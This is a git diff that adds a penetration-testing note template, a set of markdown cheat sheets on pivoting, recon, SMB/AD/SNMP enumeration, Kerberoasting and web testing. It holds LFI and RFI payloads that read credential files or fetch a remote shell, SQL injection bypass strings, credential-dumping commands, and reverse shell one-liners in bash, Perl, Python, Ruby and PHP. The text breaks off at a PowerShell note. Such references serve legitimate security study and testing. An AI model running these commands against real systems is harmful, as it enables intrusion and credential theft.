+Created by TJ Null:
+
+Twitter: https://twitter.com/TJ_Null
+Github: https://github.com/tjnull
+
+Contribution:
+
+If you would like to contribute to the template or provide suggestions, then you can submit an issue on the Github Repo here:
+- https://github.com/tjnull/TJ-JPT
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/Pivoting_Tunneling.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/Pivoting_Tunneling.md
new file mode 100644
index 0000000..db90dbe
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/Pivoting_Tunneling.md
@@ -0,0 +1,94 @@
+# SSH Tunneling
+
+
+Note: Target must have SSH running for there service
+
+1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p
+2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
+3. Add the following line into the config: Socks5 127.0.0.1
+4. Run commands through the tunnel: proxychains
+
+## SShuttle
+
+In Kali
+
+Source: https://github.com/sshuttle/sshuttle
+
+- sshuttle -r root@172.21.0.0 10.2.2.0/24
+
+
+# Meterpreter
+
+Use only if you have a meterpreter shell and you need to pivot to another network.
+
+## Portfwd
+
+- meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80
+
+## Autoroute
+In Metasploit
+1. use post/multi/manage/autoroute
+```
+msf5 post(multi/manage/autoroute) > options
+
+Module options (post/multi/manage/autoroute):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
+ NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
+ SESSION yes The session to run this module on.
+ SUBNET no Subnet (IPv4, for example, 10.10.10.0)
+
+msf5 post(multi/manage/autoroute) >
+```
+2. set session
+3. run
+
+## Metasploit Socks Proxy
+
+ 1 auxiliary/server/socks4a normal No Socks4a Proxy Server
+ 2 auxiliary/server/socks5 normal No Socks5 Proxy Server
+ 3 auxiliary/server/socks_unc normal No SOCKS Proxy UNC Path Redirection
+
+# Ncat
+
+## Http Proxy
+- ncat -vv --listen 3128 --proxy-type http
+
+## Port Forwarder
+1. mknod pivot p
+2. nc -l -p < port to listen on> 0 1>pivot
+
+# Cntlm
+
+apt install cntlm
+
+1. cntlm -u username@breakme.local -I proxy
+2. export http://127.0.0.1:3128, export https://127.0.0.1:3128
+3. 
Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128"
+
+# netsh port forwarding
+- netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
+- netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000
+
+
+# Proxy Binaries for Windows
+Windows 10 has SSH (Thanks WSL!)
+plink.exe (In Kali)
+
+# Other Tools:
+- ssf: https://github.com/securesocketfunneling/ssf
+- rpivot: https://github.com/klsecservices/rpivot
+- hans (ICMP Tunneling): http://code.gerade.org/hans/
+- Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/
+- Dnscat2: https://github.com/iagox86/dnscat2
+- Chisel: https://github.com/jpillora/chisel
+- httptunnel: In Kali apt install httptunnel
+
+# Other Resources:
+
+- https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html
+- https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/
+-
+
diff --git a/Pentest_Template_Master_1.0/_resources/310x310.png b/Pentest_Template_Master_1.0/_resources/310x310.png
new file mode 100755
index 0000000..7ebd5b4
Binary files /dev/null and b/Pentest_Template_Master_1.0/_resources/310x310.png differ
diff --git a/Pentest_Template_Master_1.0/_resources/d2550626a1c94aeebd273d43be0669c9.png b/Pentest_Template_Master_1.0/_resources/d2550626a1c94aeebd273d43be0669c9.png
new file mode 100644
index 0000000..fa27c6c
Binary files /dev/null and b/Pentest_Template_Master_1.0/_resources/d2550626a1c94aeebd273d43be0669c9.png differ
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/General Notes.md
new file mode 100644
index 0000000..655afdb
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/General Notes.md
@@ -0,0 +1,113 @@ +# "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to" + + +## tcpdump: + +- tcpdump -i eth0 +- tcpdump -c -i eth0 +- tcpdump -A -i eth0 +- tcpdump -w 0001.pcap -i eth0 +- tcpdump -r 0001.pcap +- tcpdump -n -i eth0 +- tcpdump -i eth0 port 22 +- tcpdump -i eth0 -src 172.21.10.X +- tcpdump -i eth0 -dst 172.21.10.X + +Other tools: + +Tshark (Command Line Wireshark) +Wireshark + + +## Network Scanning + +NetDiscover (ARP Scanning): +- netdiscover -i eth0 +- netdiscover -r 172.21.10.0/24 + +Nmap: + +- nmap -sn 172.21.10.0/24 +- nmap -sn 172.21.10.1-253 +- nmap -sn 172.21.10.* + +Nbtscan: +- nbtscan -r 172.21.1.0/24 + +Linux Ping Sweep (Bash) + +- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done + +Windows Ping Sweep (Run on Windows System) + +- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 172.21.1.%i is up. + + + +## Host Scanning + +Nmap: + +- nmap -sC -sV 172.21.0.0 +- nmap -Pn -sC -sV -p- 172.21.0.0 +- nmap -sV -Pn 172.21.0.0 +- nmap -T4 -sC -sV 172.21.0.0 +- nmap -A 172.21.0.0 + +Nmap Stealth: +- nmap -sS -sC -sV 172.21.0.0 +- nmap -sS -p- 172.21.0.0 + + +UDP Scan: +- nmap -sS -sU -Pn -sV 172.21.0.0 +- nmap -sU -A --top-ports=20 --version-all +- nmap -sU -A -p 53,67,68,161,162 --version-all +- unicornscan -mU -p ,161,162,137,123,138,1434,445,135,67,68,53,139,500,637,162,69 + + +IPv6 Scan: + +Nmap Scripts: + +Location: /usr/share/nmap/scripts/ + +- nmap --scripts vuln,safe,discovery -oN results.txt target-ip + +Scans through Socks proxy: + +- nmap --proxies socks4://proxy-ip:8080 target-ip + +DNSRecon: + +- dnsrecon -d www.example.com -a +- dnsrecon -d www.example.com -t axfr +- dnsrecon -d +- dnsrecon -d www.example.com -D -t brt + +Dig: + +- dig www.example.com + short +- dig www.example.com MX +- dig www.example.com NS +- dig www.example.com> SOA +- dig www.example.com ANY +noall +answer +- dig -x www.example.com +- dig -4 www.example.com (For IPv4) +- dig -6 www.example.com (For IPv6) 
+- dig www.example.com mx +noall +answer example.com ns +noall +answer +- dig -t AXFR www.example.com + +Sublis3r: + +- Sublist3r -d www.example.com +- Sublist3r -v -d www.example.com -p 80,443 + +OWASP AMASS: + +- amass enum -d www.example.com +- amass intel -whois -d www.example.com +- amass intel -active 172.21.0.0-64 -p 80,443,8080,8443 +- amass intel -ipv4 -whois -d www.example.com +- amass intel -ipv6 -whois -d www.example.com + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/Target _1.md new file mode 100644 index 0000000..9aaf438 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/Target _1.md @@ -0,0 +1,6 @@ +# Fill in results or other information about your target here: + + + + + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/General Notes.md new file mode 100644 index 0000000..dbbfa7c --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/General Notes.md @@ -0,0 +1,7 @@ +# When in Doubt...Always Enumerate! Enumeration is the key! + + + +## Resources +- http://www.0daysecurity.com/penetration-testing/enumeration.html +- Backup Link: https://web.archive.org/web/20201122081447/http://www.0daysecurity.com/penetration-testing/enumeration.html \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket General Notes.md new file mode 100644 index 0000000..cdcb8b7 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket General Notes.md 
@@ -0,0 +1,12 @@ +## In Kali + +apt install impacket-scripts + +## Github + +https://github.com/SecureAuthCorp/impacket + +## Local Locations: + +/usr/share/doc/python3-impacket/examples + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket Kerberoasting.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket Kerberoasting.md new file mode 100644 index 0000000..f12888f --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket Kerberoasting.md @@ -0,0 +1,24 @@ +## Check for Kerberoasting: + +- GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip -format hashcat/john + +## GetUserSPNs + +ASREPRoast: +- impacket-GetUserSPNs /: -request -format -outputfile +- impacket-GetUserSPNs / -usersfile -format -outputfile + +Kerberoasting: +- impacket-GetUserSPNs /: -outputfile + +Overpass The Hash/Pass The Key (PTK): +- python3 getTGT.py / -hashes [lm_hash]: +- python3 getTGT.py / -aesKey +- python3 getTGT.py /:[password] + +## Using TGT key to excute remote commands from the following impacket scripts: + +- python3 psexec.py /@ -k -no-pass +- python3 smbexec.py /@ -k -no-pass +- python3 wmiexec.py /@ -k -no-pass + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Responder.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Responder.md new file mode 100644 index 0000000..48c6d82 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Responder.md 
@@ -0,0 +1,23 @@ +Cannot use in the OSCP Exam. Fun to use on assessments. +Note: Multirelay.py does not work in python3 since the UserDict library has been depricated + + +# Source: https://github.com/lgandx/Responder + +## Make changes to config to turn off services: + +nano /usr/share/responder/Responder.conf + +## Starting Responder: + +- responder -I [Interface] -A +- responder -I [Interface] -i [IP Address] or -e [External IP] -A + +## Tools in Responder: + +Location: /usr/share/Responder/tools + +## Check for systems with SMB Signing not enabled + +- python3 RunFinger.py -i 172.21.0.0/24 + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Changelog.txt/Changelog.txt Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Changelog.txt/Changelog.txt Notes.md new file mode 100644 index 0000000..e69de29 diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/General Notes.md new file mode 100644 index 0000000..d9b562a --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/General Notes.md 
@@ -0,0 +1,126 @@ + +## Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE! + +## + +## Common Wordlists to use for Web App Scanning: + +Common Wordlists to use for Web Directory Scanning: +- /usr/share/wordlists/dirb/common.txt +- /usr/share/wordlists/dirbuster/*.txt +- /usr/share/wordlists/wfuzz/general/*.txt +- /usr/share/seclists/Discovery/Web-Content/ + +Common Wordlists to use for User Enumeration Scanning: +- /usr/share/seclists/Usernames +- /usr/share/wordlists/dirbuster/apache-user-enum-2.0 + +## Web App Scanners + +Nikto: + +- nikto --url + +Wpscan: + +- wpscan --url +- wpscan --url --enumerate ap at (All Plugins, All Themes) +- wpscan --url --enumerate u (Usernames) +- wpscan --url --enumerate v + +Web Tools for Directory Scanning: + + + +Dirb: + +- dirb +- dirb + +Gobuster: + +- gobuster dir -u -w /usr/share/wordlists/ +- gobuster dir -u -w /usr/share/wordlists/ -a Firefox (Custom Agent) +- gobuster dir -u -w /usr/share/wordlists/ -x .php,.txt,.html +- gobuster dir -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" +- gobuster dir -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" +- gobuster dir -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" +- gobuster dir -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" -o output.txt +- gobuster dir -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' + +Wfuzz: + +- wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ +- wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ +- wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests) + +- wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies) + +Dirsearch: + +- dirsearch 
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php + +FFuF: + +- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 +- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -b "COOKIE VALUE; security=low" -u http://172.21.0.0 +- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -fc 403, 302, 200 +- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -H "Host: 172.21.0.0" -u http://172.21.0.0 +- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -timeout 5 + + +Other Tools: +- Burp Suite +- OWASP Zap +- Cadaver +- SQLMap +- Joomscan +- Feroxbuster + + +## Testing for LFI: + +https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf + +Examples: + +http://example.com/index.php?page=etc/passwd +http://example.com/index.php?page=etc/passwd%00 +http://example.com/index.php?page=../../etc/passwd +http://example.com/index.php?page=%252e%252e%252f +http://example.com/index.php?page=....//....//etc/passwd + +Interesting Files: + +Linux: +/etc/passwd +/etc/shadow +/etc/issue +/etc/group +/etc/hostname +/etc/ssh/ssh_config +/etc/ssh/sshd_config +/root/.ssh/id_rsa +/root/.ssh/authorized_keys +/home/user/.ssh/authorized_keys +/home/user/.ssh/id_rsa + +Windows: + +Windows: +/boot.ini +/autoexec.bat +/windows/system32/drivers/etc/hosts +/windows/repair/SAM + + + +## Testing for RFI: + +http://example.com/index.php?page=http://callback.com/shell.txt +http://example.com/index.php?page=http://callback.com/shell.txt%00 +http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt + +## Resources + +- Turning LFI to RFI: https://l.avala.mp/?p=241 \ No newline at end of file 
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/SQL Injection.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/SQL Injection.md new file mode 100644 index 0000000..cc7d1db --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/SQL Injection.md @@ -0,0 +1,25 @@ +Testing for Bypasses: + +' or 1=1 LIMIT 1 -- +' or 1=1 LIMIT 1 -- - +' or 1=1 LIMIT 1# +'or 1# +' or 1=1 -- +' or 1=1 -- - + +# SQLMAP + +## sqlmap crawl +sqlmap -u http://172.21.0.0 --crawl=1 + +## sqlmap dump database +sqlmap -u http://172.21.0.0 --dbms=mysql --dump + +## sqlmap shell +sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell + +# SQLI + +Testing for a row: + +- http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Target _1.md new file mode 100644 index 0000000..68755f5 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Target _1.md @@ -0,0 +1 @@ +# Fill in results or other information about your target here: \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/General Notes.md new file mode 100644 index 0000000..ffc452e --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/General Notes.md 
@@ -0,0 +1,63 @@ + +## Enumerate SMB: + +Enum4linux: + +- Enum4linux -a 172.21.0.0 + +SMBmap: + +- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password] +- smbmap -H 172.21.0.0 -d [domain] -u "" -p "" + +Nmap: + +- nmap --script smb-* -p 139,445, 172.21.0.0 +- nmap --script smb-enum-* -p 139,445, 172.21.0.0 + +/usr/share/nmap/scripts/smb-brute.nse +/usr/share/nmap/scripts/smb-enum-domains.nse +/usr/share/nmap/scripts/smb-enum-groups.nse +/usr/share/nmap/scripts/smb-enum-processes.nse +/usr/share/nmap/scripts/smb-enum-services.nse +/usr/share/nmap/scripts/smb-enum-sessions.nse +/usr/share/nmap/scripts/smb-enum-shares.nse +/usr/share/nmap/scripts/smb-enum-users.nse +/usr/share/nmap/scripts/smb-flood.nse +/usr/share/nmap/scripts/smb-ls.nse +/usr/share/nmap/scripts/smb-mbenum.nse +/usr/share/nmap/scripts/smb-os-discovery.nse +/usr/share/nmap/scripts/smb-print-text.nse +/usr/share/nmap/scripts/smb-protocols.nse +/usr/share/nmap/scripts/smb-psexec.nse +/usr/share/nmap/scripts/smb-security-mode.nse +/usr/share/nmap/scripts/smb-server-stats.nse +/usr/share/nmap/scripts/smb-system-info.nse + + +SMBClient: + +- smbclient -L 172.21.0.0 +- smbclient //172.21.0.0/tmp + +Impacket SmbClient: + +- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0 + +RPCclient: + +- rpcclient -U "" -N 172.21.0.0 enumdomusers + +Impacket: + +- python3 samdump.py SMB 172.21.0.0 + +CrackMapExec: + +- crackmapexec smb -L +- crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth +- crackmapexec 172.21.0.0 -u Administrator -H [hash] --share +- crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz + + + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/Target _1.md new file mode 100644 index 0000000..68755f5 --- /dev/null 
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md
new file mode 100644
index 0000000..a482896
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md
@@ -0,0 +1,33 @@
+# Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy.
+
+
+Anonymous Credential LDAP Dumping:
+
+- ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’
+
+Impacket GetADUsers.py (Must have valid credentials)
+
+- GetADUsers.py -all -dc-ip
+
+Impacket lookupsid.py:
+
+- /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0
+
+Impacket Secretdump:
+
+python3 secretdump.py 'breakme.local/Administrator@172.21.0.0' -just-dc-user anakin
+
+Windapsearch:
+
+https://github.com/ropnop/windapsearch
+
+- python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
+
+
+
+## References:
+
+- PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise
+
+- Attacking Active Directory: 0 to 0.9:
+https://zer1t0.gitlab.io/posts/attacking_ad/
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/General Notes.md
new file mode 100644
index 0000000..5ba634a
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/General Notes.md
@@ -0,0 +1,57 @@
+SNMP Walk:
+
+
+- snmpwalk -c public -v1 ipaddress 1
+- snmpwalk -c private -v1 ipaddress 1
+- snmpwalk -c manager -v1 ipaddress 1
+
+
+Nmap:
+
+- nmap 172.21.0.0 -Pn -sU -p 161 --script=
+
+/usr/share/nmap/scripts/snmp-brute.nse
+/usr/share/nmap/scripts/snmp-hh3c-logins.nse
+/usr/share/nmap/scripts/snmp-info.nse
+/usr/share/nmap/scripts/snmp-interfaces.nse
+/usr/share/nmap/scripts/snmp-ios-config.nse
+/usr/share/nmap/scripts/snmp-netstat.nse
+/usr/share/nmap/scripts/snmp-processes.nse
+/usr/share/nmap/scripts/snmp-sysdescr.nse
+/usr/share/nmap/scripts/snmp-win32-services.nse
+/usr/share/nmap/scripts/snmp-win32-shares.nse
+/usr/share/nmap/scripts/snmp-win32-software.nse
+/usr/share/nmap/scripts/snmp-win32-users.nse
+
+Metasploit aux modules:
+
+ auxiliary/scanner/misc/oki_scanner
+ auxiliary/scanner/snmp/aix_version
+ auxiliary/scanner/snmp/arris_dg950
+ auxiliary/scanner/snmp/brocade_enumhash
+ auxiliary/scanner/snmp/cisco_config_tftp
+ auxiliary/scanner/snmp/cisco_upload_file
+ auxiliary/scanner/snmp/cnpilot_r_snmp_loot
+ auxiliary/scanner/snmp/epmp1000_snmp_loot
+ auxiliary/scanner/snmp/netopia_enum
+ auxiliary/scanner/snmp/sbg6580_enum
+ auxiliary/scanner/snmp/snmp_enum
+ auxiliary/scanner/snmp/snmp_enum_hp_laserjet
+ auxiliary/scanner/snmp/snmp_enumshares
+ auxiliary/scanner/snmp/snmp_enumusers
+ auxiliary/scanner/snmp/snmp_login
+
+
+Onesixtyone:
+
+- onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X
+
+Snmp-check
+
+
+- snmp-check 172.21.0.0 -c public
+
+
+Impacket:
+
+- python3 samdump.py SNMP 172.21.0.0
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/5. FTP/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/5. FTP/General Notes.md
new file mode 100644
index 0000000..3b36bf7
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/5. FTP/General Notes.md
@@ -0,0 +1,27 @@
+# FTP Enumeration Tools
+
+### Nmap Enumeration
+```
+$ ls -lh /usr/share/nmap/scripts/ | grep ftp
+-rw-r--r-- 1 root root 4.5K Oct 12 09:29 ftp-anon.nse
+-rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-bounce.nse
+-rw-r--r-- 1 root root 3.1K Oct 12 09:29 ftp-brute.nse
+-rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-libopie.nse
+-rw-r--r-- 1 root root 3.3K Oct 12 09:29 ftp-proftpd-backdoor.nse
+-rw-r--r-- 1 root root 3.7K Oct 12 09:29 ftp-syst.nse
+-rw-r--r-- 1 root root 5.9K Oct 12 09:29 ftp-vsftpd-backdoor.nse
+-rw-r--r-- 1 root root 5.8K Oct 12 09:29 ftp-vuln-cve2010-4221.nse
+-rw-r--r-- 1 root root 5.7K Oct 12 09:29 tftp-enum.nse
+$ nmap x.x.x.x -p 21 -sV --script=exampleScript1.nse,exampleScript2.nse
+```
+### Manual Connection
+```
+$ ftp x.x.x.x
+```
+```
+$ nc x.x.x. 21
+```
+### Connect via Browser
+```
+ftp://x.x.x.x
+```
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/6. TCP/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/6. TCP/Target _1.md
new file mode 100644
index 0000000..9aaf438
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/6. TCP/Target _1.md
@@ -0,0 +1,6 @@
+# Fill in results or other information about your target here:
+
+
+
+
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/7. UDP/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/7. UDP/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/7. UDP/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/8. Other/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/8. Other/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/8. Other/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your target here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/1. General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/1. General Notes.md
new file mode 100644
index 0000000..e08f878
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/1. General Notes.md
@@ -0,0 +1,112 @@ +## Pre-requisites for runninging exploits + +- Check the version of the operating system. +- Check the software version. +- Check if there is exploit for it (Searchsploit, ExploitDB, Google, etc). +- If you have an exploit, is there a Metasploit Module for it? + + +## Default Credentials + +- https://cirt.net/passwords +- https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials + +## Reverse Shells + +Bash: + +- bash -i >& /dev/tcp/IP ADDRESS/8080 0>&1 + +Perl: + +``` +perl -e 'use Socket;$i="IP ADDRESS";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +``` + +Python: + +- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' + +IPv6: + +- python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' + +Ruby: + +- ruby -rsocket -e'f=TCPSocket.open("IP ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' +- ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' + + +PHP: + +Pentest Monkey Reverse Shell for PHP: +In Kali: + +/usr/share/webshells/php/php-reverse-shell.php + +Link: http://pentestmonkey.net/tools/web-shells/php-reverse-shell + +- php -r '$sock=fsockopen("IP ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");' + +Windows Powershell Oneliner: + +Note: To change the IP Address replace the number values in Check.for.Callback.Connection. To change the port pick your own numeric values to equal the number you want your shell to callback to you. 
